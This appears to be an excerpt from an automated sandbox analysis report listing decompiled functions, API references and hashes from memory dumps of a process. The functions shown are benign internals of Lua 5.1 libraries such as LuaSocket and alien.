Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_pushstring.$lua_rawset.$lua_settop.$L_newmetatable.L_openlib.lua_createtable.lua_getfield.lua_pushboolean.lua_pushcclosure.
String ID: select{able}$udp{any}$udp{connected}$udp{unconnected}
API String ID: 2552940023-2756629665
Opcode ID: e2e97869a3d88bfe2e509336b808ddb38f3685ebdc661e40a677b72b378dbfe4
Instruction ID: 0094f7f34fbae7865c22bd83c62c1e1f2548718d25a5e28270dcadf1268172cc
Opcode Fuzzy Hash: e2e97869a3d88bfe2e509336b808ddb38f3685ebdc661e40a677b72b378dbfe4
Instruction Fuzzy Hash: 31F052627CA72531AE6232AC2C87F8F19495FFAF8EF014446F544351D796DB229200AE

Uniqueness

Uniqueness Score: -1.00%

Function 00991A40, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E00991A40(intOrPtr _a4) {
				intOrPtr _t9;

				_t9 = _a4;
				E00991010(_t9, "tcp{master}", 0x996118);
				E00991010(_t9, "tcp{client}", 0x996118);
				E00991010(_t9, "tcp{server}", 0x996118);
				E00991180(_t9, "tcp{master}", "tcp{any}");
				E00991180(_t9, "tcp{client}", "tcp{any}");
				E00991180(_t9, "tcp{server}", "tcp{any}");
				_push(0);
				_push(0x9961f0);
				_push(0);
				_push(_t9);
				L00994B48();
				return 0;
			}

0x00991a41
0x00991a50
0x00991a60
0x00991a70
0x00991a80
0x00991a90
0x00991aa0
0x00991aa8
0x00991aaa
0x00991aaf
0x00991ab1
0x00991ab2
0x00991abd

APIs

Part of subcall function 00991010: luaL_newmetatable.LUA5.1(?,?), ref: 0099101C
Part of subcall function 00991010: lua_pushstring.LUA5.1(?,__index,?,?), ref: 00991027
Part of subcall function 00991010: lua_createtable.LUA5.1(?,00000000,00000000,?,__index,?,?), ref: 00991031
Part of subcall function 00991010: lua_pushstring.LUA5.1(?,class,?,00000000,00000000,?,__index,?,?), ref: 0099103C
Part of subcall function 00991010: lua_pushstring.LUA5.1(?,?,?,class,?,00000000,00000000,?,__index,?,?), ref: 00991043
Part of subcall function 00991010: lua_rawset.LUA5.1(?,000000FD,?,?,?,class,?,00000000,00000000,?,__index,?,?), ref: 0099104B
Part of subcall function 00991010: lua_pushstring.LUA5.1(?,00000000), ref: 0099105F
Part of subcall function 00991010: lua_pushcclosure.LUA5.1(?,?,00000000,?,00000000), ref: 0099106B
Part of subcall function 00991010: lua_rawset.LUA5.1(?,?,?,?,00000000,?,00000000), ref: 00991083
Part of subcall function 00991010: lua_rawset.LUA5.1(?,000000FD), ref: 00991098
Part of subcall function 00991010: lua_settop.LUA5.1(?,000000FE,?,000000FD), ref: 009910A0

Part of subcall function 00991180: lua_getfield.LUA5.1(?,FFFFD8F0,?), ref: 00991190
Part of subcall function 00991180: lua_pushstring.LUA5.1(?,?,?,FFFFD8F0,?), ref: 0099119B
Part of subcall function 00991180: lua_pushboolean.LUA5.1(?,00000001,?,?,?,FFFFD8F0,?), ref: 009911A3
Part of subcall function 00991180: lua_rawset.LUA5.1(?,000000FD,?,00000001,?,?,?,FFFFD8F0,?), ref: 009911AB
Part of subcall function 00991180: lua_settop.LUA5.1(?,000000FE,?,000000FD,?,00000001,?,?,?,FFFFD8F0,?), ref: 009911B3

luaL_openlib.LUA5.1(?,00000000,009961F0,00000000), ref: 00991AB2

Strings

tcp{any}, xrefs: 00991A75, 00991A85, 00991A95
tcp{client}, xrefs: 00991A5A, 00991A8A
tcp{server}, xrefs: 00991A6A, 00991A9A
tcp{master}, xrefs: 00991A4A, 00991A7A

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_pushstring.$lua_rawset.$lua_settop.$L_newmetatable.L_openlib.lua_createtable.lua_getfield.lua_pushboolean.lua_pushcclosure.
String ID: tcp{any}$tcp{client}$tcp{master}$tcp{server}
API String ID: 2552940023-428066678
Opcode ID: 024043ce7dd5e97a25579ee7de0c96e6e331702b4ba5b172ecd268f91418ad21
Instruction ID: 190e6a34dbe8cabc2a650b48b9f5ff217671facc6a5146c9d0241601c1731c04
Opcode Fuzzy Hash: 024043ce7dd5e97a25579ee7de0c96e6e331702b4ba5b172ecd268f91418ad21
Instruction Fuzzy Hash: 27F052617CA72231DD62322C5D03F9E25485FEAFCEF128542B540311DB9ADA22A600EE

Uniqueness

Uniqueness Score: -1.00%

Function 10016250, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10016250(intOrPtr _a4) {
				char _v128;
				long _t5;

				_t5 = GetLastError();
				_t13 = _t5;
				if(FormatMessageA(0x1200, 0, _t5, 0,  &_v128, 0x80, 0) == 0) {
					return E100019F0(_a4, "system error %d\n", _t13);
				} else {
					return E10001980( &_v128, _a4,  &_v128);
				}
			}

0x10016257
0x1001625d
0x1001627d
0x100162b9
0x1001627f
0x1001629b
0x1001629b

APIs

GetLastError.KERNEL32(00000000), ref: 10016257
FormatMessageA.KERNEL32(00001200,00000000,00000000,00000000,?,00000080,00000000), ref: 10016275
lua_pushstring.LUA5.1(?,?), ref: 1001628C

Part of subcall function 10001980: lua_pushnil.LUA5.1(?), ref: 1000198D

lua_pushfstring.LUA5.1(?,system error %d,00000000), ref: 100162AA

Strings

system error %d, xrefs: 100162A4

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFormatLastMessagelua_pushfstring.lua_pushnil.lua_pushstring.
String ID: system error %d
API String ID: 4189104124-1688351658
Opcode ID: ced932b2ebe922aceb86740f67fa2e53711e9dd1abc93ad9e036c1d76146156a
Instruction ID: e93c7caf6d80027e6fce571d7c7a84bc0fac63e123047623dcf05784b940fba3
Opcode Fuzzy Hash: ced932b2ebe922aceb86740f67fa2e53711e9dd1abc93ad9e036c1d76146156a
Instruction Fuzzy Hash: 2DF08C7964021077F660D7149C46FEB37A8BB897D4F848528FA8CCA1C1EE38A54C83A6

Uniqueness

Uniqueness Score: -1.00%

Function 00A22910, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00A22910(intOrPtr _a4) {
				void* __ebx;
				void* __esi;
				void* _t3;
				struct HINSTANCE__* _t5;
				struct HINSTANCE__** _t9;
				void* _t10;
				intOrPtr _t11;
				void* _t12;
				void* _t13;

				_t11 = _a4;
				_t9 = E00A21110(_t3, 1, _t11, "alien_library");
				_t13 = _t12 + 4;
				if(_t9 == 0) {
					_push("alien library expected");
					_push(1);
					_push(_t11);
					L00A23F14();
					_t13 = _t13 + 0xc;
				}
				_t5 =  *_t9;
				if(_t5 != 0) {
					FreeLibrary(_t5);
					_t10 = _t9[1];
					if(_t10 != 0) {
						free(_t10);
					}
				}
				return 0;
			}

0x00a22912
0x00a22926
0x00a22928
0x00a2292d
0x00a2292f
0x00a22934
0x00a22935
0x00a22936
0x00a2293b
0x00a2293b
0x00a2293e
0x00a22942
0x00a22945
0x00a2294b
0x00a22950
0x00a22953
0x00a22959
0x00a22950
0x00a22961

APIs

Part of subcall function 00A21110: lua_touserdata.LUA5.1(?,00000001,?,00A22DF6,alien_buffer), ref: 00A21113
Part of subcall function 00A21110: lua_getmetatable.LUA5.1(?,00000001), ref: 00A21123
Part of subcall function 00A21110: lua_getfield.LUA5.1(?,FFFFD8F0,?), ref: 00A2113A
Part of subcall function 00A21110: lua_rawequal.LUA5.1(?,000000FF,000000FE,?,FFFFD8F0,?), ref: 00A21144
Part of subcall function 00A21110: lua_settop.LUA5.1(?,000000FD), ref: 00A21153

luaL_argerror.LUA5.1(?,00000001,alien library expected), ref: 00A22936
FreeLibrary.KERNEL32(00000000), ref: 00A22945
free.MSVCR80(?), ref: 00A22953

Strings

alien_library, xrefs: 00A22917
alien library expected, xrefs: 00A2292F

Memory Dump Source

Source File: 00000003.00000002.487114164.0000000000A21000.00000020.00020000.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000003.00000002.487089623.0000000000A20000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487157920.0000000000A25000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487201925.0000000000A27000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487230936.0000000000A28000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeL_argerror.Libraryfreelua_getfield.lua_getmetatable.lua_rawequal.lua_settop.lua_touserdata.
String ID: alien library expected$alien_library
API String ID: 2846885650-1088627394
Opcode ID: 663fe3d392e1257e4865d5b8104d16dd84713410067fc72f8d66f85fd2705ca6
Instruction ID: 30587dbb4fdee2c7f5253a62c194351df07ae2fdc587bfe6c937ab014ac7ba1d
Opcode Fuzzy Hash: 663fe3d392e1257e4865d5b8104d16dd84713410067fc72f8d66f85fd2705ca6
Instruction Fuzzy Hash: 12E06DB6A40625BBD610676CBD45B6B736DBFC4760F580438FA18A7201E635E86283A2

Uniqueness

Uniqueness Score: -1.00%

Function 00A22ED0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E00A22ED0(intOrPtr _a4) {
				void* __ebx;
				void* __esi;
				void* _t2;
				void* _t3;
				void* _t7;
				intOrPtr _t9;
				void* _t10;
				void* _t11;

				_t9 = _a4;
				_t3 = E00A21110(_t2, 1, _t9, "alien_buffer");
				_t7 = _t3;
				_t11 = _t10 + 4;
				if(_t7 == 0) {
					_push("alien buffer expected");
					_push(1);
					_push(_t9);
					L00A23F14();
					_t11 = _t11 + 0xc;
				}
				_push(1);
				_push(2);
				_push(_t9);
				L00A23FC2();
				_push(_t7 + _t3 - 1);
				_push(_t9);
				L00A23F7A();
				return 1;
			}

0x00a22ed2
0x00a22ee1
0x00a22ee6
0x00a22ee8
0x00a22eed
0x00a22eef
0x00a22ef4
0x00a22ef5
0x00a22ef6
0x00a22efb
0x00a22efb
0x00a22efe
0x00a22f00
0x00a22f02
0x00a22f03
0x00a22f0d
0x00a22f0e
0x00a22f0f
0x00a22f1c

APIs

Part of subcall function 00A21110: lua_touserdata.LUA5.1(?,00000001,?,00A22DF6,alien_buffer), ref: 00A21113
Part of subcall function 00A21110: lua_getmetatable.LUA5.1(?,00000001), ref: 00A21123
Part of subcall function 00A21110: lua_getfield.LUA5.1(?,FFFFD8F0,?), ref: 00A2113A
Part of subcall function 00A21110: lua_rawequal.LUA5.1(?,000000FF,000000FE,?,FFFFD8F0,?), ref: 00A21144
Part of subcall function 00A21110: lua_settop.LUA5.1(?,000000FD), ref: 00A21153

luaL_argerror.LUA5.1(?,00000001,alien buffer expected), ref: 00A22EF6
luaL_optinteger.LUA5.1(?,00000002,00000001), ref: 00A22F03
lua_pushlightuserdata.LUA5.1(?,00000000,?,00000002,00000001), ref: 00A22F0F

Strings

alien_buffer, xrefs: 00A22ED7
alien buffer expected, xrefs: 00A22EEF

Memory Dump Source

Source File: 00000003.00000002.487114164.0000000000A21000.00000020.00020000.sdmp, Offset: 00A20000, based on PE: true

Associated: 00000003.00000002.487089623.0000000000A20000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487157920.0000000000A25000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.487201925.0000000000A27000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.487230936.0000000000A28000.00000002.00020000.sdmp Download File

Similarity

API ID: L_argerror.L_optinteger.lua_getfield.lua_getmetatable.lua_pushlightuserdata.lua_rawequal.lua_settop.lua_touserdata.
String ID: alien buffer expected$alien_buffer
API String ID: 1763071720-566560685
Opcode ID: 717ca68012a4ee660e9ce4adbc49ede5f189d3531936f20d4fab74205a2c1b25
Instruction ID: 772d8a46fdd4b1eb86c2315688373f2a14f30bf7655d9b6e3e75476a983d4349
Opcode Fuzzy Hash: 717ca68012a4ee660e9ce4adbc49ede5f189d3531936f20d4fab74205a2c1b25
Instruction Fuzzy Hash: 18E080A3F8163436E911312C3E43F9F155DDBD3B60F550435F504A7242E5A95F1141F6

Uniqueness

Uniqueness Score: -1.00%

Function 10016600, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10016600(intOrPtr _a4, char* _a8) {
				char* _t5;
				void* _t7;
				signed int _t10;

				_t12 = _a8;
				_t5 = strchr(_a8, "-");
				_t17 = _t5;
				if(_t5 != 0) {
					_t2 =  &(_t5[1]); // 0x1
					_t12 = _t2;
				}
				_t13 = _a4;
				_t7 = E100019F0(_a4, "luaopen_%s", E1000F840(_t10, _a4, _t12, ".", "_"));
				E100011B0(_t17, _t13, 0xfffffffe);
				return _t7;
			}

0x10016608
0x1001660f
0x10016618
0x1001661a
0x1001661c
0x1001661c
0x1001661c
0x1001662a
0x1001663b
0x10016645
0x10016651

APIs

strchr.MSVCRT ref: 1001660F
luaL_gsub.LUA5.1(?,100165CF,1001939C,1001A93C), ref: 1001662F
lua_pushfstring.LUA5.1(?,luaopen_%s,00000000,?,100165CF,1001939C,1001A93C), ref: 1001663B
lua_remove.LUA5.1(?,000000FE,?,luaopen_%s,00000000,?,100165CF,1001939C,1001A93C), ref: 10016645

Strings

luaopen_%s, xrefs: 10016635

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_gsub.lua_pushfstring.lua_remove.strchr
String ID: luaopen_%s
API String ID: 2483102839-885815835
Opcode ID: 1c325af117d3387dfb18411f1f2c5d14333f1b46704f7267492c5a04af2ca2ba
Instruction ID: 6b9ed3e92a8066da3ad4c3533a0a8322189042e68551ef85ca957c2446f47897
Opcode Fuzzy Hash: 1c325af117d3387dfb18411f1f2c5d14333f1b46704f7267492c5a04af2ca2ba
Instruction Fuzzy Hash: 2EE06D2A9091313A9A01D6691C04DEB26EDDE8E1A170A4125FB14E7143DA34FAC683A5

Uniqueness

Uniqueness Score: -1.00%

Function 009914C0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 29
networkCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E009914C0() {
				char _v4;
				intOrPtr _t11;
				char* _t13;

				_v4 = 0;
				if(gethostname(_t13, 0x100) >= 0) {
					_push(_t13);
					_push(_v4);
					L00994AD0();
					return 1;
				} else {
					_t11 = _v4;
					_push(_t11);
					L00994B4E();
					_push("gethostname failed");
					_push(_t11);
					L00994AD0();
					return 2;
				}
			}

0x009914d0
0x009914df
0x00991515
0x00991516
0x00991517
0x0099152a
0x009914e1
0x009914e2
0x009914e9
0x009914ea
0x009914ef
0x009914f4
0x009914f5
0x00991509
0x00991509

APIs

gethostname.WSOCK32 ref: 009914D8
lua_pushnil.LUA5.1(?), ref: 009914EA
lua_pushstring.LUA5.1(?,gethostname failed,?), ref: 009914F5
lua_pushstring.LUA5.1(?), ref: 00991517

Strings

gethostname failed, xrefs: 009914EF

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_pushstring.$gethostnamelua_pushnil.
String ID: gethostname failed
API String ID: 3170778249-1933209611
Opcode ID: 6c6c7e89b9bf539cb7701a99dbb3c923705931f2acfa249e9b4bce5fe673584b
Instruction ID: f092ce91cf62673e948ac6751302c2fd315f9a0d479941f3538d9a2e91bf69ee
Opcode Fuzzy Hash: 6c6c7e89b9bf539cb7701a99dbb3c923705931f2acfa249e9b4bce5fe673584b
Instruction Fuzzy Hash: A3F06CB550915057EB21F31CDC82FEF73945FE5308F444418F5C952181F5B9559983DB

Uniqueness

Uniqueness Score: -1.00%

Function 10010850, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10010850(void* __ebx, void* __ecx, intOrPtr _a4) {
				void* _t2;
				void* _t13;

				_t10 = _a4;
				_t2 = E1000F4E0(__ecx, _t13, _a4, 2, "=(load)", 0);
				E1000F410(__ebx, _t13, _t10, 1, 6);
				E10001160(_t10, 3);
				return E100107F0(_t10, E100021F0(_t10, E100108A0, 0, _t2));
			}

0x10010851
0x10010860
0x1001086c
0x10010874
0x10010893

APIs

luaL_optlstring.LUA5.1(?,00000002,=(load),00000000), ref: 10010860

Part of subcall function 1000F4E0: lua_type.LUA5.1(?,?,?,?,1000F27E,?,?,?,00000000), ref: 1000F4EC

luaL_checktype.LUA5.1(?,00000001,00000006,?,00000002,=(load),00000000), ref: 1001086C

Part of subcall function 1000F410: lua_type.LUA5.1(?,?), ref: 1000F41C

lua_settop.LUA5.1(?,00000003,?,00000001,00000006,?,00000002,=(load),00000000), ref: 10010874
lua_load.LUA5.1(?,100108A0,00000000,00000000,?,00000003,?,00000001,00000006,?,00000002,=(load),00000000), ref: 10010882

Strings

=(load), xrefs: 10010858

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_type.$L_checktype.L_optlstring.lua_load.lua_settop.
String ID: =(load)
API String ID: 3616000223-2325116534
Opcode ID: fb97479a6e84a16a01c911deca0c029b79d6310752b7369054dd2c2b77d7f2a9
Instruction ID: 101472424674221819ad4eb460c31d044e6b08e1645fb74708f9719a9a3292be
Opcode Fuzzy Hash: fb97479a6e84a16a01c911deca0c029b79d6310752b7369054dd2c2b77d7f2a9
Instruction Fuzzy Hash: B8E0123978562031F532D124AC07FDF014CCF86B94F004015B740BF1C65AE57A8241FD

Uniqueness

Uniqueness Score: -1.00%

Function 10013BD0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E10013BD0(intOrPtr _a4) {
				void* _t4;
				void* _t9;
				void* _t14;

				_t11 = _a4;
				_t4 = E1000F4E0(_t9, _t14, _a4, 1, 0, 0);
				_t6 =  *((intOrPtr*)(0x100178c8 + E1000F260(_t9, _t11, 2, "all", 0x100178e0) * 4));
				__imp__setlocale( *((intOrPtr*)(0x100178c8 + E1000F260(_t9, _t11, 2, "all", 0x100178e0) * 4)), _t4);
				E10001980(_t9, _t11, _t6);
				return 1;
			}

0x10013bd1
0x10013bdd
0x10013bf6
0x10013bff
0x10013c07
0x10013c16

APIs

luaL_optlstring.LUA5.1(?,00000001,00000000,00000000), ref: 10013BDD

Part of subcall function 1000F4E0: lua_type.LUA5.1(?,?,?,?,1000F27E,?,?,?,00000000), ref: 1000F4EC

luaL_checkoption.LUA5.1(?,00000002,all,100178E0,?,00000001,00000000,00000000), ref: 10013BF1

Part of subcall function 1000F260: luaL_optlstring.LUA5.1(?,?,?,00000000), ref: 1000F279
Part of subcall function 1000F260: lua_pushfstring.LUA5.1(?,invalid option '%s',00000000), ref: 1000F2EA
Part of subcall function 1000F260: luaL_argerror.LUA5.1(?,?,00000000,?,invalid option '%s',00000000), ref: 1000F2F6

setlocale.MSVCRT ref: 10013BFF
lua_pushstring.LUA5.1(?,00000000), ref: 10013C07

Part of subcall function 10001980: lua_pushnil.LUA5.1(?), ref: 1000198D

Strings

all, xrefs: 10013BE7

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_optlstring.$L_argerror.L_checkoption.lua_pushfstring.lua_pushnil.lua_pushstring.lua_type.setlocale
String ID: all
API String ID: 702004227-991457757
Opcode ID: 17330bdcb0df8a1161f89eb5312c7d8173d302714a259f6c0ac96349cefb02de
Instruction ID: e0f228ed3a533b7e668ebe8e1a97037ac2249d63a1e565499139d0a28d436096
Opcode Fuzzy Hash: 17330bdcb0df8a1161f89eb5312c7d8173d302714a259f6c0ac96349cefb02de
Instruction Fuzzy Hash: BCE0863969112033F62092A89C4BFDB226CDB86790F104414F604AB181CAB4F88282B4

Uniqueness

Uniqueness Score: -1.00%

Function 10010350, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10010350(void* __ebx, void* __eflags, void* __fp0, intOrPtr _a4) {

				_t9 = _a4;
				E1000F470(__ebx, __eflags, _a4, 1);
				if(E10001CC0(__eflags, _a4, 1) != 0) {
					E1000F630(__eflags, __fp0, _t9, 1, "__metatable");
					return 1;
				} else {
					E100018C0(_t9);
					return 1;
				}
			}

0x10010351
0x10010358
0x1001036a
0x10010384
0x10010392
0x1001036c
0x1001036d
0x1001037b
0x1001037b

APIs

luaL_checkany.LUA5.1(?,00000001), ref: 10010358

Part of subcall function 1000F470: lua_type.LUA5.1(?,?), ref: 1000F47C
Part of subcall function 1000F470: luaL_argerror.LUA5.1(?,?,value expected), ref: 1000F490

lua_getmetatable.LUA5.1(?,00000001,?,00000001), ref: 10010360
lua_pushnil.LUA5.1(?), ref: 1001036D
luaL_getmetafield.LUA5.1(?,00000001,__metatable), ref: 10010384

Strings

__metatable, xrefs: 1001037C

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_argerror.L_checkany.L_getmetafield.lua_getmetatable.lua_pushnil.lua_type.
String ID: __metatable
API String ID: 3653713887-377347451
Opcode ID: 4279e3690a990331348fa4708473050f0156b198b7ec640cbb0dab8c926fff86
Instruction ID: 516dd05b8b49c6df0bbcdee9bdde4c2092467e3366ba3d01ff347f8cce8fcb88
Opcode Fuzzy Hash: 4279e3690a990331348fa4708473050f0156b198b7ec640cbb0dab8c926fff86
Instruction Fuzzy Hash: C1E0127EA6562032F911A1287C43FCB2149CF417D8F054064FA0469286E7D6BBD201D6

Uniqueness

Uniqueness Score: -1.00%

Function 1000F180, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E1000F180(void* __ebx, void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				void* __esi;
				void* _t15;

				_t12 = _a4;
				_t11 = _a8;
				_push(E10001410(_t15, _a4, _a8));
				_push(E10001440(_t12));
				return E1000F090(__ebx, _t12, _t15, _t12, _t11, E100019F0(_t12, "%s expected, got %s", _a12));
			}

0x1000f181
0x1000f186
0x1000f191
0x1000f198
0x1000f1b6

APIs

lua_type.LUA5.1(?,?), ref: 1000F18C
lua_typename.LUA5.1(?,00000000,?,?), ref: 1000F193
lua_pushfstring.LUA5.1(?,%s expected, got %s,?,00000000,?,00000000,?,?), ref: 1000F1A4
luaL_argerror.LUA5.1(?,?,00000000,?,%s expected, got %s,?,00000000,?,00000000,?,?), ref: 1000F1AC

Part of subcall function 1000F090: lua_getstack.LUA5.1(?,00000000), ref: 1000F0A0
Part of subcall function 1000F090: luaL_error.LUA5.1(?,bad argument #%d (%s),?,?), ref: 1000F0BC

Strings

%s expected, got %s, xrefs: 1000F19E

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_argerror.L_error.lua_getstack.lua_pushfstring.lua_type.lua_typename.
String ID: %s expected, got %s
API String ID: 3974032844-156976391
Opcode ID: 54356eb0cbc98da98f3fe1d8df4301ef740b1f1aa77246921bc4d287ad227972
Instruction ID: 6eab1d3a9ff1e3fa061882e2940ab3c3c21328b31aec66a2c5f9997f8e871ba7
Opcode Fuzzy Hash: 54356eb0cbc98da98f3fe1d8df4301ef740b1f1aa77246921bc4d287ad227972
Instruction Fuzzy Hash: 54D05E7B4055213B6101E62AAC01EEF66ACDFCA2D4B08081DF604E7127D724BE8283FB

Uniqueness

Uniqueness Score: -1.00%

Function 10011380, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E10011380(void* __ebx, void* __eflags, intOrPtr _a4) {
				intOrPtr _t8;

				_t12 = __eflags;
				_t8 = _a4;
				E1000F410(__ebx, __eflags, _t8, 2, 5);
				E10001160(_t8, 2);
				if(E10001FE0(_t12, _t8, 1) == 0) {
					_push("\'setfenv\' cannot change environment of given object");
					_push(_t8);
					E1000F230();
				}
				return 1;
			}

0x10011380
0x10011381
0x1001138a
0x10011392
0x100113a4
0x100113a6
0x100113ab
0x100113ac
0x100113b1
0x100113ba

APIs

luaL_checktype.LUA5.1(?,00000002,00000005), ref: 1001138A

Part of subcall function 1000F410: lua_type.LUA5.1(?,?), ref: 1000F41C

lua_settop.LUA5.1(?,00000002,?,00000002,00000005), ref: 10011392
lua_setfenv.LUA5.1(?,00000001,?,00000002,?,00000002,00000005), ref: 1001139A
luaL_error.LUA5.1(?,'setfenv' cannot change environment of given object), ref: 100113AC

Part of subcall function 1000F230: luaL_where.LUA5.1(?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F238
Part of subcall function 1000F230: lua_pushvfstring.LUA5.1(?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F248
Part of subcall function 1000F230: lua_concat.LUA5.1(?,00000002,?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F250
Part of subcall function 1000F230: lua_error.LUA5.1(?,?,00000002,?,?,00000001,?,00000001,?,1000F169,?,bad argument #%d to '%s' (%s),?,?,?), ref: 1000F256

Strings

'setfenv' cannot change environment of given object, xrefs: 100113A6

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_checktype.L_error.L_where.lua_concat.lua_error.lua_pushvfstring.lua_setfenv.lua_settop.lua_type.
String ID: 'setfenv' cannot change environment of given object
API String ID: 547986150-2037046198
Opcode ID: 4dbb8981afa2e5eefe6fa3fb54fdd58bd6fefe325c6a3b43543090f39ad9c031
Instruction ID: 36c572273ab46a5c28f059f80280f66f434e3d8f1df0704fa713262dac3c3287
Opcode Fuzzy Hash: 4dbb8981afa2e5eefe6fa3fb54fdd58bd6fefe325c6a3b43543090f39ad9c031
Instruction Fuzzy Hash: E2D05E3D75162131F011E1146C07FCF10888F027C8F414024FA00791CBF69ABAD201EE

Uniqueness

